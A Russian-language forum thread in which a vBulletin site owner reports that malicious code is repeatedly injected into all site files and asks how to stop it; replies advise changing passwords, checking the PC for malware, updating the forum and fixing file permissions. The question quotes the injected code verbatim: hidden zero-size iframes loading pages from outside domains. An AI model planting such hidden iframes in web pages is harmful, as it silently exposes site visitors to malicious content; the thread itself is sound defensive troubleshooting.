vbulletin , борьба с вставкой вредоносных фреймов.

[Удален]
499

Все HTML файлы, включая основные index.php файлы, заражаются вирусом.

Внизу каждой страницы прописывается код

<iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Удалить, потратить время не проблема. Но всё повторилось вновь и вновь.

Как от этого защититься? Как такое получается у злоумышленника?

Я так понимаю нужно настроить грамотно права на запись файлов?Подскажите конкретней...

vBulletin 3.7.3 Patch Level 1

Север
На сайте с 21.03.2008
Offline
154
#1

Delgado,

1. Сменить все пароли, на примерно такие "&L84sMTS@NDw#k@", не сохранять пароль от фтп в клиенте. Соответственно проверить весь комп на гадости.

2. Обновить форум до последней актуальной версии.

3. Поискать чужие папки-файлы в директории форума, потом выше.

Сомнительно, что это дырка в движке, воблочка этим не страдает.

СМОД 755 на папки, 644 на файлы. Как правило, этого достаточно.

Тех. https://searchengines.guru/ru/forum/255402 подержка Vbulletin √ <---/---> Отличные VDS √ ( https://cp.inferno.name/cart.php?aff=2714 ) <---/---> Хочу Всё Знать https://t.me/hochuVsjoZnat
WG
На сайте с 01.06.2009
Offline
6
WSG
#2

Скорее всего либо вирус у вас на домашнем компе + сохранён пароль на FTP, либо неправильно выставлены права на папки. В первую очередь обновить антивирус, удалить сохранённый пароль в FTP менеджере, проверить домашний комп, затем проставить права, как написали выше. Обновлять форум только после этого, т.к. при наличии вируса у вас - когда зайдёте по фтп снова, ифрейм опять появится во всех файлах.

Проверка безопасности сайтов (/ru/forum/361288), качественно и за адекватные деньги. Анализ сайта (http://wsg.su) на наличие уязвимостей.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий